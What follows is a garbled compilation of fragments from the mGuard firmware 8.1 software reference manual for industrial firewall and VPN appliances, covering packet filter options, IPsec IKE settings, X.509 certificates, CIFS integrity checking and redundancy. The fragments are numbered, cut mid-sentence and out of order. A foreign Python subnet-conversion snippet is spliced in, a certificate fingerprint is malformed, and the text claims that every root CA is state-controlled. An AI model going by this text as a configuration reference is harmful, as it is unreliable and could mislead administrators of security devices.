1) In the case of the mGuard industrial rs with built-in modem or ISDN terminal adapter, Built-in Modem is available as an option, and in the case of mGuard rs4000 3G, Built-in mobile network modem is available as an option.

6.1.2 Dial-out
Only mGuard rs4000 3G, mGuard rs4000, mGuard centerport, mGuard industrial rs, mGuard blade, mGuard delta, EAGLE mGuard.

(Screenshot, Network >> Interfaces >> General / Dial-out / Dial-in / Modem Console. PPP dial-out options: Phone number to call (ATD); Authentication: PAP; User name; Password; PAP server authentication: No; Dial on demand: Yes; Idle timeout: Yes; Idle time (seconds): 300; Local IP: 0.0.0.0; Rem
34. (Screenshot, Network Security >> Packet Filter >> Advanced: Maximum table size; Allow TCP connections upon SYN only (after reboot, connections need to be re-established); Timeout for established TCP connections: 432000 seconds; Timeout for closed TCP connections: 3500 seconds; Abort existing connections upon firewall reconfiguration: Yes; FTP: Yes; IRC: Yes; PPTP: No; H.323: No; SIP: No; OPC classic: No; Sanity check for OPC classic: Yes; Timeout for OPC classic connection expectations (seconds): 1.)

Network Security >> Packet Filter >> Advanced: Consistency checks
Maximum size of ping packets (ICMP Echo Request): Refers to the length of the entire packet including the header. The packet length is normally 64 bytes, but it can be larger. If oversized packets are to be blocked to prevent bottlenecks (in the scope of functions for the mGuard rs2000 3G, mGuard rs2000), a maximum value can be specified. This value should be more than 64 bytes in order not to block normal ICMP echo requests.

Network Security >> Packet Filter >> Advanced: Network Modes Router, PPTP, PPPoE, Stealth Mode
Enable TCP/UDP/ICMP consistency checks
Allow TCP keepalive packets without TCP flags
ICMP via primary external interface for the mGuard
ICMP via secondary external interface for the mGuard
ICMP via DMZ for the mGuard A
35. (Screenshot: Session Timeout (seconds): 1800.)

Management >> Web Settings >> General
Language: If automatic is selected in the list of languages, the device uses the language setting of the computer's browser.
Session Timeout (seconds): Specifies the period of inactivity in seconds after which the user will be automatically logged out of the mGuard web interface. Possible values: 15 to 86400 (24 hours).

Management menu: 4.2.2 Access

(Screenshot, Management >> Web Settings >> Access. HTTPS Web Access, Allowed Networks (Log ID fw-https-access): From IP 0.0.0.0/0, Interface External, Action Accept, Log No (two rules). RADIUS Authentication: Enable RADIUS authentication: No. User authentication: User authentication method: Login with X.509 client certificate or password. X.509 Certificate (only displayed when Login with X.509 user certificate is selected): VPN RootCA01, Authorized for access as root; Battaglia Mauro, Authorized for access as root.)

The mGuard must not be simultaneously configured via web access, shell access or SNMP. Simultaneous configuration via the different access methods might lead to unexpected results.

When web access via HTTPS protocol is enabled, the mGuard can be configured from a remote computer using its web-based administrator interface. This means
36. ... >> CIFS AV Scan Connector: Allowed Networks
Accessible as: Displays the virtual network drive provided by the mGuard for the CIFS Antivirus Scan Connector function. This path is displayed with UNC notation. By means of copy and paste it can be directly used on the PC which is to use the virtual network drive (see Accessing the virtual network (CIFS Antivirus Scan Connector) on page 245). Three UNC addresses (for the internal and external interface and DMZ) are displayed in Router network mode, while one UNC address is displayed in Stealth network mode. Access to the virtual network drive can be prevented as a result of the settings in the Allowed Networks section. Enter a rule here accordingly, especially if access via the external interface is required. Depending on the mGuard configuration, further access options can be established over other IP addresses, such as access via VPN channels or via incoming calls for dial-in (see Dial-in on page 136).
Server's workgroup: Name of the CIFS server workgroup.
Login: Login for the server.
Password: Password for login.
Exported share's name: Name for the computers that are to use the CIFS server to access the combined drives. The drives are connected under this name.
Allow write access: No: read-only access. Yes: read and write access.
External / Internal / DMZ: These rules allow external access to the CIFS se
37. ... >> Connections >> Edit >> IKE Options
Perfect Forward Secrecy (PFS): Method for providing increased security during data transmission. With IPsec, the keys for data exchange are renewed at defined intervals. With PFS, new random numbers are negotiated with the partner instead of being derived from previously agreed random numbers. The partner must have the same entry. We recommend activation for security reasons.
• Select Yes if the partner supports PFS.
Set Perfect Forward Secrecy (PFS) to No if the partner is an IPsec/L2TP client.

Lifetimes and Limits: The keys of an IPsec connection are renewed at defined intervals in order to increase the difficulty of an attack on an IPsec connection.
ISAKMP SA Lifetime: Lifetime in seconds of the keys agreed for ISAKMP SA. Default setting: 3600 seconds (1 hour). The maximum permitted lifetime is 86400 seconds (24 hours).
IPsec SA Lifetime: Lifetime in seconds of the keys agreed for IPsec SA. Default setting: 28800 seconds (8 hours). The maximum permitted lifetime is 86400 seconds (24 hours).
IPsec SA Traffic Limit: 0 to 2147483647 bytes. The value 0 indicates that there is no traffic limit for the IPsec SAs on this VPN connection. All other values indicate the maximum number of bytes which are encrypted by the IPsec SA for this VPN connection (Hard Limit).
Re-key Margin for Lifetimes: Applies to ISAKMP SAs and IPsec SAs. Minimum duration before the old key expires
38. ... >> Interfaces >> General: Network Status
External IP address (display only): The addresses via which the mGuard can be accessed by devices from the external network. They form the interface to other parts of the LAN or to the Internet. If the transition to the Internet takes place here, the IP addresses are usually assigned by the Internet service provider (ISP). If an IP address is assigned dynamically to the mGuard, the currently valid IP address can be found here. In Stealth mode, the mGuard adopts the address of the locally connected computer as its external IP.
Active Default route via (display only): The IP address that the mGuard uses to try to reach unknown networks is displayed here. This field can contain none if the mGuard is in Stealth mode.
Used DNS servers (display only): The names of the DNS servers used by the mGuard for name resolution are displayed here. This information can be useful, for example, if the mGuard is using the DNS servers assigned to it by the Internet service provider.
Internal modem: Displays the status of the internal modem (mobile network modem of the mGuard rs4000/rs2000 3G and the internal analog modem for the mGuard industrial rs).

Network >> Interfaces >> General: Network Mode
Network Mode: Router Mode: Only used when Router is selected as the network mode.
Network menu: S
39. (Screenshot, Configuration Profiles / External Config Storage (ECS): Current state of the ECS: Not present; ... to the ECS; The root password to save to the ECS; Automatically save configuration changes to an ECS: No; Encrypt the data on the ECS: No; ... configuration from ECS during ...)

You can save the settings of the mGuard as a configuration profile under any name on the mGuard. It is possible to create multiple configuration profiles. You can then switch between different profiles as required, for example if the mGuard is used in different environments. Furthermore, you can also save the configuration profiles as files on your configuration computer. Alternatively, these configuration files can be loaded onto the mGuard and activated. In addition, you can restore the Factory Default settings at any time.

Certain models also allow the configuration profiles to be stored on external configuration storage (ECS): SD card (mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000, mGuard delta, mGuard pci SD, mGuard pcie SD), V.24/USB memory stick (EAGLE mGuard, mGuard centerport). See Profiles on an external storage medium on page 78.

When a configuration profile is saved, the passwords used for authenticating administrative access to the mGuard are not saved.

It is possible to load and activate a configuration profile that was created under an older firmware version. However, the reverse is not true: a configuration pr
40. ...means of corresponding firewall rules, for example by specifying Drop as an action.
Accept means that the data packets may pass through.
Reject means that the data packets are sent back and the sender is informed of their rejection. (In Stealth mode, Reject has the same effect as Drop.)
Drop means that the data packets are not permitted to pass through. They are discarded, which means that the sender is not informed of their whereabouts.
Comment: Freely selectable comment for this rule.
Log: For each individual rule you can specify whether the use of the rule should be logged (set Log to Yes) or should not be logged (set Log to No, default setting).

No: this network drive is not mirrored. Yes: this network drive is mirrored and made available.
Name of the network drive to be imported, created under CIFS Integrity Monitoring >> Importable Shares >> Edit.
The content of the included drive is located in this directory.
External 2 and Dial-in are only for devices with a serial interface (see Network >> Interfaces on page 105).

CIFS Integrity Monitoring menu: Accessing the virtual network (CIFS Antivirus Scan Connector)
The virtual network drive provided by the mGuard for the CIFS Antivirus Scan Connector can be integrated in Windows Explorer. To do this, open the Tools > Map Network Drive menu in Windows Explorer and enter the path using UNC notation. This path is
41. ...of ambiguity, the URL call only affects the first entry in the list of connections.

It is not possible to communicate with the individual channels of a VPN connection. If individual channels are deactivated, they are not started. Starting and stopping in this way thus has no effect on the settings of the individual channels, i.e. the list under Transport and Tunnel Settings.

Starting and stopping a connection using a URL only makes sense if the connection is deactivated in the configuration or if Connection startup is set to Stopped. Otherwise the mGuard re-establishes the connection automatically.

If the status of a VPN connection is queried using the URL specified above, then the following responses can be expected:

Table 10-1 Status of a VPN connection
(response not legible): A VPN connection with this name does not exist.
void: The connection is inactive due to an error, e.g. the external network is down or the host name of the partner could not be resolved in an IP address (DNS). The response void is also issued by the CGI interface even if no error occurred, if for example the VPN connection is deactivated according to the configuration (No set in the corresponding column) and has not been enabled temporarily using the CGI interface or CMD contact.
ready: The connection is ready to establish channels or allow incoming queries regarding channel setup.
(next response): At least one channel has already
42. 10.2.5 IKE Options

(Screenshot, IPsec VPN >> Connections >> Berlin Blomberg >> IKE Options. ISAKMP SA (Key Exchange): 3DES / All algorithms; this preference list starts with the most preferred pair of algorithms. IPsec SA (Data Exchange): 3DES / All algorithms; this preference list starts with the most preferred pair. Perfect Forward Secrecy (PFS): Yes; activation is recommended due to security reasons. Lifetimes and Limits: ISAKMP SA Lifetime: 3600 seconds; IPsec SA Lifetime: 28800 seconds; IPsec SA Traffic Limit: 0 bytes; Re-key Margin for Lifetimes: 540 (applies to ISAKMP SAs and IPsec SAs); Re-key Margin for the Traffic Limit: 0 bytes (applies to IPsec SAs only); Re-key Fuzz: 100 (applies to all re-key margins); Keying tries: 0 (0 means unlimited tries); Rekey: Yes. Dead Peer Detection: Delay between requests for a sign of life: 30 seconds; Timeout for absent sign of life after which peer is assumed dead: 120.)

IPsec VPN >> Connections >> Edit >> IKE Options
ISAKMP SA (Key Exchange): Algorithms: Decide on which encryption method should be used with the administrator of the partner.
Encryption: 3DES-168 is the most commonly used method and is therefore set by default. Fundamentally the following applies: the more bits an encryption alg
43. ...1500 bytes (often set by DSL), it is recommended that a value of 1414 bytes be set. This also allows enough space for additional headers. If you want to use this option, specify a value lower than the default setting.

10.1.2 DynDNS Monitoring

(Screenshot, IPsec VPN >> Global >> Options >> DynDNS Monitoring: Watch hostnames of remote VPN Gateways: Yes; Refresh Interval (sec): 300.)

For an explanation of DynDNS, see DynDNS on page 160.

IPsec VPN >> Global >> Options: DynDNS Monitoring
Watch hostnames of remote VPN gateways (Yes/No): If the mGuard has the address of a VPN partner in the form of a host name (see Defining a new VPN connection / VPN connection channels on page 255) and this host name is registered with a DynDNS service, then the mGuard can check the relevant DynDNS at regular intervals to determine whether any changes have occurred. If so, the VPN connection will be established to the new IP address.
Refresh Interval (sec): Default: 300.

10.2 IPsec VPN >> Connections

Requirements for a VPN connection: A general requirement for a VPN connection is that the IP addresses of the VPN partners are known and can be accessed. mGuards provided in Stealth network mode are preset to the multiple clients stealth configuration. In this mode, you need to configure a management IP address and d
44. (Redundancy status display; parts of the screenshot are not legible in the source.)
... 2011  Connectivity Check: External Interface: The check is successful.  Wed Nov 9 11:59:06 CET 2011
Connectivity Check: Internal Interface: The check is successful.  Wed Oct 26 15:49:17 CEST 2011
Phrase Swap Controller: Availability Check's Phrase: The configured phrase is in use.  Wed Oct 26 15:49:20 CEST 2011
Phrase Swap Controller: Phrase of the Encrypted State Synchronization: The configured phrase is in use.  Wed Oct 26 15:49:19 CEST 2011
State Replication: Connection Tracking Table: The database is up to date.  Wed Nov 9 11:59:13 CET 2011
State Replication: IPsec VPN Connections: The database is up to date.  Wed Nov 9 11:59:13 CET 2011
Virtual Interface Controller: Virtual Interface(s): Forwarding of traffic is allowed.  Wed Nov 9 11:59:06 CET 2011
State History: ... Wed Nov 9 11:59:13 CET 2011; Additionally, the mGuard waits for a restarting component. active: The mGuard is actively forwarding and filtering traffic.  Wed Nov 9 11:59:06 CET 2011; active ... Wed Nov 9 11:59:06 CET 2011; becomes_active ... Wed Nov 9 11:59:06 CET 2011; ... Wed Nov 9 11:59:06 CET 2011

outdated: The mGuard has an empty or outdated firewall or VPN state information which it wants to re-synchronize.
faulty: The mGuard does not yet have proper connectivity or cannot determine it for sure.
active: The mGuard is actively forwarding and fi
45. 2015 Innominate Security Technologies AG. Innominate document number UG208102814 053.

Contents
1 (title not legible) 11
1.1 Basic properties of the mGuards 11
1.2 Typical application scenarios 13
1.2.1 Stealth mode (Plug-n-Protect) 13
1.2.2 Network router 14
1.2.3 (title not legible) 15
1.2.4 VPN gateway 15
1.2.5 WLAN via VPN 16
1.2.6 Resolving network conflicts 17
2 Configuration 19
2.1 Suitable browsers 19
2.2 (title not legible) 19
2.3 Input help during configuration (system messages) 20
2.4 Using the web interface 21
2.5 CIDR (Classless Inter-Domain Routing) 24
2.6 Network example diagram 25
3 Changes compared to the previous version 27
3.1 Overview of modifications in version 8.1 27
3.1.1 User firewall
46. ...3b 7c 4c 64 90 bf ff 8e

The subject distinguished name (or subject for short) uniquely identifies the certificate owner. The entry consists of several components. These are known as attributes (see the example certificate above). The following table contains a list of possible attributes. The sequence of attributes in an X.509 certificate can vary.

Table 17-1 X.509 Certificate
Abbreviation  Name                 Explanation
CN            Common name          Identifies the person or object to whom or which the certificate belongs. Example: CN=server1
E             E-mail address       Specifies the e-mail address of the certificate owner.
O             Organization         Specifies the organization or company. Example: O=Innominate
OU            Organizational unit  Specifies the department within an organization or company. Example: OU=Development
L             Locality             Specifies the place (locality). Example: L=Hamburg
ST            State                Specifies the state or county. Example: ST=Bavaria
C             Country              Two-letter code that specifies the country (Germany: DE). Example: C=DE

A filter can be set for the subject (i.e. the certificate owner) during VPN connections and remote service access to the mGuard using SSH or HTTPS. This would ensure that only certificates from partners are accepted that have certain attributes in the subject line. N
47. ...65535 to the IP addresses. These distinguish the various services offered by the protocols. A number of additional protocols are based on UDP and TCP. These include HTTP (Hyper Text Transfer Protocol), HTTPS (Secure Hyper Text Transfer Protocol), SMTP (Simple Mail Transfer Protocol), POP3 (Post Office Protocol, Version 3) and DNS (Domain Name Service). ICMP is based on IP and contains control messages. SMTP is an e-mail protocol based on TCP. IKE is an IPsec protocol based on UDP. ESP is an IPsec protocol based on IP. On a Windows PC, the WINSOCK.DLL or WSOCK32.DLL provides a common interface for both protocols. (See Datagram on page 358.)

VLAN: A VLAN (Virtual Local Area Network) divides a physical network into several independent logical networks which exist in parallel. Devices on different VLANs can only access devices within their own VLAN. Accordingly, assignment to a VLAN is no longer defined by the network topology alone, but also by the configured VLAN ID. VLAN settings can be used as optional settings for each IP. A VLAN is identified by its VLAN ID (1 to 4094). All devices with the same VLAN ID belong to the same VLAN and can therefore communicate with each other. The Ethernet packet for a VLAN according to IEEE 802.1Q is extended by 4 bytes, with 12 bits available for recording the VLAN ID. VLAN IDs 0 and 4095 are reserved and cannot be used for VLAN identification.
48. COM Server: Baudrate and Handshake: the Serial Console settings are used. The RFC 2217 Server is initialized with the same serial settings as the RAW ver

(Screenshot, COM Server, Allowed Networks (Log ID fw-comserver-access): From IP 0.0.0.0/0, Interface External, Action Accept, Log Yes.)

Network >> Interfaces >> Modem Console (mGuard platforms with serial interface): COM server
Type: Here you can select the way that the COM server should operate. Possible options are: RFC 2217, RAW client, RAW server.
Local Port: Defines the port that the COM server should respond to. Is available when the type is set to RFC 2217 or RAW server. Values: 1 to 65535. Default: 3001.
Remote IP address: Defines the remote IP address of a RAW client. Is available when the type is set to RAW client. Default: 10.1.0.254.
Remote Port: Defines the port to which the RAW client sends the data. Is available when the type is set to RAW client. Values: 1 to 65535. Default: 3001.
Serial parameters: Defines the parity and stop bits for the serial interface. The general packet length of the serial interface is 8 bits. 1 stop bit, no parity (default); 1 stop bit, even parity; 1 stop bit, odd parity; 2 stop bits, no parity; 2 stops bits, even
CRLs in order to use them. Certificates are only checked for revocations if the Enable CRL checking option is set to Yes (see Certificate settings on page 195). A CRL with the same issuer name must be present for each issuer name specified in the certificates to be checked. If such a CRL is not present and CRL checking is enabled, the certificate is considered invalid.

Issuer: Information read directly from the CRL by the mGuard. Shows the issuer of the relevant CRL.

Last Update: Information read directly from the CRL by the mGuard. Time and date of issue of the current CRL on the mGuard.

Next Update: Information read directly from the CRL by the mGuard. Time and date when the CA will next issue a new CRL. This information is not influenced or considered by the CRL download interval.

URL: Specify the URL of the CA where CRL downloads are obtained, if the CRL should be downloaded on a regular basis as defined under CRL download interval on the Certificate settings tab page (see Certificate settings on page 195).

Download via VPN: If set to Yes, the mGuard uses a VPN tunnel to access the applicable URL where the CRL is available for download. For this to happen, a suitable VPN tunnel must be configured, activated and allow access. Otherwise the CRL downloads from this URL will not be forwarded via a VPN tunnel.

Authentication >> Certificates >>
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1 (0x1)
        Signature Algorithm: md5WithRSAEncryption
        Issuer: C=XY, ST=Austria, L=Graz, O=TrustMe Ltd, OU=Certificate Authority, CN=CA/Email=ca@trustme.dom
        Validity
            Not Before: Oct 29 17:39:10 2000 GMT
    >   Subject: CN=anywhere.com, E=doctrans.de, C=DE, ST=Hamburg, L=Hamburg, O=Innominate, OU=Security
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit): (hex value omitted)
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Subject Alternative Name: email:xyz@anywhere.com
            Netscape Comment: mod_ssl generated test server certificate
            Netscape Cert Type: SSL Server
    Signature Algorithm: md5WithRSAEncryption
        (signature value omitted)
5.1 Blade Control >> Overview ... 101
5.2 Blade Control >> Blade 01 to 12 ... 102
5.2.1 Blade in Slot ... 102
5.2.2 Configuration ... 103
6 Network menu ... 105
6.1 Network >> Interfaces ... 105
6.1.1 General ... 106
6.1.2 Dial-out ... 130
6.1.3 Dial-in ... 136
6.1.4 Modem / Console ... 139
6.2 Network >> Ethernet ... 148
6.2.1 MAU Settings ... 148
6.2.2 Multicast ... 150
6.2.3 Ethernet ... 151
6.3 Network >> NAT ... 152
6.3.1 Masquerading ... 152
6.3.2 IP and Port Forwarding ... 155
6.4 Network >> DNS ... 157
6.4.1 DNS Server ... 157
6.4.2 DynDNS ... 160
6.5 Network >> DHCP ... 162
6.5.1 Internal / External DHCP ... 162
6.6 Network >> Proxy Settings ... 167
6.6.1 HTTP(S) Proxy Settings ...
DE. Subject Alternative Names: (none). Issuer: CN=VPN SubCA 01, O=Beispiel Lieferant, C=DE. Validity: From Mar 20 18:33:09 2007 GMT to Mar 20 18:33:09 2010 GMT. Fingerprint MD5: 11 73 7D 98 89 6F AB DB 23 A1 22 06 A2 68 79 EC. SHA1: 9 14 0A 50 84 36 62 C5 B0 2F 1F A7 FB 1E 89 47 30 53 BC B8. Filename: *.pem (Browse).

VPN Identifier:
Local: Valid values are the certificate's distinguished name. Same as no entry.
Remote: Valid values are the certificate's distinguished name. Same as no entry.

IPsec VPN >> Connections >> Edit >> Authentication

Authentication method: There are two options: X.509 Certificate (default) and Pre-shared Secret (PSK). Depending on the chosen method, the page contains different setting options.

Authentication method: X.509 Certificate. This method is supported by most modern IPsec implementations. With this option, each VPN device has a secret private key and a public key in the form of an X.509 certificate, which contains further information about the certificate's owner and the certification authority (CA). The following must be specified:
- How the mGuard authenticates itself to the partner
- How the mGuard authenticates the remote partner

How the mGuard authenticates itself to the partner: (Screenshot: Authentication method: X.509 Certificate; Local X.509 Certificate: VPN Endpunkt Kundendienst MA; Remote CA Certificate: No CA certificate, but the Remote Certificate be
mGuard Firmware 8.1: Configuration of the mGuard Security Appliances. Software Reference Manual. Innominate Security Technologies.

Software Reference Manual mGuard Firmware 8.1. Designation: UM EN MGUARD 8.1. Revision: 02. Order No.: (not given). 2015-01-27.

This user manual is valid for the mGuard software release 8.1 when using devices of the mGuard product range: mGuard rs4000 3G, mGuard rs2000 3G, mGuard rs4000, mGuard rs2000, mGuard centerport, mGuard industrial rs, mGuard smart², mGuard smart, mGuard pci SD, mGuard pcie SD, mGuard blade, mGuard delta, mGuard delta², EAGLE mGuard.

Please observe the following notes

Target group of this user manual: The use of products described in this user manual is aimed solely at:
- Qualified electricians or persons instructed by them, who are familiar with applicable standards and other regulations regarding electrical engineering and in particular the relevant safety concepts.
- Qualified application programmers and software engineers, who are familiar with the safety concepts of automation technology as well as applicable standards and other regulations.

Explanation of symbols used and signal words: This symbol indicates hazards that could lead to personal injury. Obey all safety measures that follow this symbol to avoid possible injury or death. There
QoS menu: VPN via Dial-in settings for egress queues. (Screenshot: QoS >> Egress Queues VPN, tab pages VPN via Internal, VPN via External, VPN via External 2, VPN via Dial-in. Enabling: Enable Egress QoS: No. Total Bandwidth Rate / Bandwidth Rate Limit: unlimited. Queues: Urgent, unlimited, High; Default, unlimited, Medium; Important, unlimited, Medium; Low Priority, unlimited, Low.)

All of the tab pages listed above for Egress Queues for the Internal, External, External 2 and Dial-in interfaces, and for VPN connections routed via these interfaces, have the same setting options. In all cases, the settings relate to the data that is sent externally into the network from the relevant mGuard interface.

QoS menu >> Egress Queues >> Internal / External / External 2 / Dial-in
QoS menu >> Egress Queues VPN >> VPN via Internal / VPN via External / VPN via External 2 / VPN via Dial-in

Enabling: Enable Egress QoS. No (default): this feature is disabled. Yes: this feature is enabled. This option is recommended if the interface is connected to a network with low bandwidth. This enables bandwidth allocation to be influenced in favor of particularly important data.

Total Bandwidth Rate / Bandwidth Rate Limit (kbps or Packets/s): Total maximum bandwidth that is physically available
Password changes for one of the predefined users (root, admin, netadmin, audit and user).

Authentication >> Administrative Users >> RADIUS Filters

RADIUS Filters for Administrative Access

Group Filter ID: The group name may only be used once. Two lines must not have the same value. Answers from the RADIUS server with a notification of successful authentication must have this group name in their Filter-ID attribute. Up to 50 characters are allowed (printable UTF-8 characters only, without spaces).

Authorized for access: Each group is assigned an administrative role: admin (Administrator), netadmin (Administrator for the network), audit (Auditor). The netadmin and audit authorization levels relate to access rights with the mGuard device manager.

Authentication menu

7.2 Authentication >> Firewall Users

To prevent private surfing on the Internet, for example, every outgoing connection is blocked under Network Security >> Packet Filter >> DMZ. VPN is not affected by this. Under Network Security >> User Firewall, different firewall rules can be defined for certain users, e.g. outgoing connections are permitted. This user firewall rule takes effect as soon as the relevant firewall user(s) to whom this user firewall rule applies has or have logged in (see Network Security
Patterns

Name: Freely definable name for a set of rules for the files to be checked. This name must be selected under CIFS Integrity Monitoring >> CIFS Integrity Checking >> Settings >> Edit in order for the pattern set to be activated. Click on Edit to define a set of rules for the files to be checked and save this under the defined name.

(Screenshot: CIFS Integrity Monitoring >> CIFS Integrity Checking >> Set of Filename Patterns, Rules for files to check. Recoverable entries: \System Volume Information Exclude; \factoryrecovery Exclude; \$Recycle.Bin Exclude; pagefile.sys Exclude; *.exe Include; *.com Include; *.dll Include; *.bat Include; *.cmd Include.)

CIFS Integrity Monitoring >> CIFS Integrity Checking >> Set of Filename Patterns >> Edit

Rules for files to check, Filename pattern: The following rules apply. A pattern such as \*.exe means that the files located in a specific directory and with file extension exe are checked or excluded. Only one wildcard is permitted per directory or file name. Wildcards represent characters; e.g. a pattern with "win" followed by a wildcard in the directory part and the extension exe returns files with the extension exe that are located in a directory that begins with "win". A wildcard at the start means that any directory is searched, even those at the top level if this is empty. This cannot be combined with other char
Activate traps: Yes / No. Enterprise OID: mGuardTrapIndustrial. Generic trap: enterpriseSpecific. Specific trap: mGuardTrapIndustrialTemperature (1). Additional: mGuardSystemTemperature, mGuardTrapIndustrialTempHiLimit, mGuardTrapIndustrialLowLimit. The trap indicates the temperature in the event of the temperature exceeding the specified limit values.

Enterprise OID: mGuardTrapIndustrial. Generic trap: enterpriseSpecific. Specific trap: mGuardTrapAutoConfigAdapterState (4). Additional: mGuardTrapAutoConfigAdapterChange. This trap is sent after access to the ECS.

Blade switch failure: Activate traps: Yes / No. Enterprise OID: mGuardTrapBladeCTRL. Generic trap: enterpriseSpecific. Specific trap: mGuardTrapBladeCtrlPowerStatus (2). Additional: mGuardTrapBladeRackID, mGuardTrapBladeSlotNr, mGuardTrapBladeCtrlPowerStatus. This trap is sent when the power supply status of the blade pack changes.

Enterprise OID: mGuardTrapBladeCTRL. Generic trap: enterpriseSpecific. Specific trap: mGuardTrapBladeCtrlRunStatus (3). Additional: mGuardTrapBladeRackID, mGuardTrapBladeSlotNr, mGuardTrapBladeCtrlRunStatus. This trap is sent when the blade run status changes.

Backup / restore: Activate traps: Yes / No. Enterprise OID: mGuardTrapBladeCtrlCfg. Generic trap: enterpriseSpecific. Specific trap: mGuardTrapBladeCt
The configuration page containing the firewall rule that the log entry refers to is displayed.

Blade: In addition to error messages, the following messages are output on the mGuard blade controller. The areas enclosed by < and > are replaced by the relevant data in the log entries:
blade daemon <version> starting
Blade <bladenr> online
Blade <bladenr> is mute
Blade <bladenr> not running
Reading timestamp from blade <bladenr>
Push configuration to blade <bladenr>
reconfiguration of blade <bladenr> returned <returncode>
blade <bladenr>: <text>
Pull configuration from blade <bladenr>
Pull configuration from blade <bladenr> returned <returncode>

CIFS AV Scan Connector: This log contains CIFS server messages. This server is used by the mGuard itself for share purposes. In addition, messages that occur when connecting the network drives and are grouped together and provided by the CIFS server are also visible.

CIFS Integrity Checking: Messages relating to the integrity check of network drives are displayed in this log. In addition, messages that occur when connecting the network drives and are required for the integrity check are also visible.

DHCP server / relay: Messages from the services defined under Network >> DHCP.

SNMP / LLDP: Messages from services defined
The mGuard may receive VPN connections encapsulated in TCP even when it is positioned behind a NAT gateway in the network and thus cannot be reached by the VPN partner under its primary external IP address. To do this, the NAT gateway must forward the corresponding TCP port to the mGuard (see "Listen for incoming VPN connections which are encapsulated" on page 251).

TCP encapsulation can only be used if an mGuard Version 6.1 or later is used at both ends of the VPN tunnel.

TCP encapsulation should only be used if required, because connections are slowed down by the significant increase in the data packet overhead and by the correspondingly longer processing times.

If the mGuard is configured to use a proxy for HTTP and HTTPS in the Network >> Proxy Settings menu item, then this proxy is also used for VPN connections that use TCP encapsulation. TCP encapsulation supports the basic authentication and NTLM authentication methods for the proxy.

For the TCP encapsulation to work through an HTTP proxy, the proxy must be named explicitly in the proxy settings (Network >> Proxy Settings menu item), i.e. it must not be a transparent proxy, and this proxy must also understand and permit the HTTP method CONNECT.

TCP encapsulation does not work in connection with authentication via pre-shared key (PSK).

IPsec VPN menu: As devices in the TCP encapsulation, the m
VPN partners; to register its IP address with a DynDNS service; to send SNMP traps; to forward log messages to a SysLog server; to download a CRL from an HTTP(S) server; to authenticate a user through a RADIUS server; to download a configuration profile through an HTTPS server; to download a firmware update from an HTTPS server.

With firewall redundancy in Router network mode, devices connected to the same LAN segment as the redundant pair must use their respective virtual IP addresses as gateways for their routes. If these devices were to use the actual IP address of either of the mGuard devices, this would work until that particular mGuard failed. However, the other mGuard would then not be able to take over.

Redundancy

Targets for the connectivity check: If a target is set for ICMP echo requests as part of the connectivity check, these requests must be answered within a certain time, even if the network is busy with other data. The network path between the redundant pair and these targets must be set so that it is also able to forward the ICMP responses when under heavy load. Otherwise the connectivity check for an mGuard could erroneously fail. Targets can be configured for the internal and external interface in the connectivity check (see Connectivity Checks on page 313). It is important that these targets are actually connected to the specifi
Working with non-sortable tables: Tables are non-sortable if the order of the data records contained within them does not play any technical role. It is then not possible to insert or move rows. With these tables you can: delete rows; append rows to the end of the table in order to create a new data record with settings (e.g. user firewall templates). The symbols for inserting a new table row are therefore different.
1. Click on the arrow to append a new row.
2. The new row is appended below the existing table. You can now enter or specify values in the row.

2.9 CIDR (Classless Inter-Domain Routing)

IP subnet masks and CIDR are methods of notation that combine several IP addresses to create a single address area. An area comprising consecutive addresses is handled like a network. To specify an area of IP addresses for the mGuard, e.g. when configuring the firewall, it may be necessary to specify the address area in CIDR format. In the table below, the left-hand column shows the IP subnet mask, while the far right-hand column shows the corresponding CIDR notation.

(Table: IP subnet mask and corresponding CIDR notation; the table contents did not survive extraction.)
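Since the mask-to-CIDR table is not recoverable here, the conversion it illustrated is shown as an added example (not from the manual or the mGuard firmware): a dotted subnet mask is turned into a prefix length, a non-contiguous mask is rejected rather than silently truncated, and an address plus mask is normalised into the a.b.c.d/n form a firewall rule expects. Parsing relies on Python's standard ipaddress module.

```python
"""Subnet mask <-> CIDR prefix conversion, as needed when an address area is
entered for an mGuard firewall rule in CIDR format (e.g. 0.0.0.0/0).
Added example; not part of the manual or the mGuard firmware."""
import ipaddress


def mask_to_prefix(mask: str) -> int:
    """Return the CIDR prefix length for a dotted IPv4 subnet mask.

    A valid mask is a run of 1-bits followed only by 0-bits; anything else
    (e.g. 255.0.255.0) is rejected instead of being silently truncated."""
    value = int(ipaddress.IPv4Address(mask))          # raises on malformed input
    prefix = 0
    while prefix < 32 and value & (1 << (31 - prefix)):
        prefix += 1                                   # count leading 1-bits
    if value & ((1 << (32 - prefix)) - 1):            # any 1-bit after the run?
        raise ValueError(f"non-contiguous subnet mask: {mask}")
    return prefix


def prefix_to_mask(prefix: int) -> str:
    """Inverse conversion: prefix length -> dotted subnet mask."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix length must be between 0 and 32")
    value = ((1 << prefix) - 1) << (32 - prefix) if prefix else 0
    return str(ipaddress.IPv4Address(value))


def to_cidr(address: str, mask: str) -> str:
    """Combine an address and a mask into the CIDR form used in rule tables,
    clearing host bits (192.168.1.77 + 255.255.255.0 -> 192.168.1.0/24)."""
    net = ipaddress.IPv4Network(f"{address}/{mask_to_prefix(mask)}", strict=False)
    return str(net)


def area_contains(cidr: str, host: str) -> bool:
    """Would a packet from `host` fall into the address area `cidr`?"""
    return ipaddress.IPv4Address(host) in ipaddress.IPv4Network(cidr)
```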
a superordinate CA certificate is in turn subordinate to another superordinate CA, then its CA certificate can be used to check the CA certificate of the subordinate instance, etc. This chain of trust continues down to the root instance (the root CA or certification authority). The root CA's CA file is necessarily self-signed, since this instance is the highest available and is ultimately the basis of trust. No one else can certify that this instance is actually the instance in question. A root CA therefore is a state or a state-controlled organization.

The mGuard can use its imported CA certificates to check the authenticity of certificates shown by partners. In the case of VPN connections, for example, partners can only be authenticated using CA certificates. This requires all CA certificates to be installed on the mGuard in order to form a chain with the certificate shown by the partner. In addition to the CA certificate from the CA whose signature appears on the certificate shown by the VPN partner to be checked, this also includes the CA certificate of the superordinate CA, and so forth up to the root certificate. The more meticulously this chain of trust is checked in order to authenticate a partner, the higher the level of security will be.

Client / server: In a client-server environment, a server is a program or computer which accepts and responds to
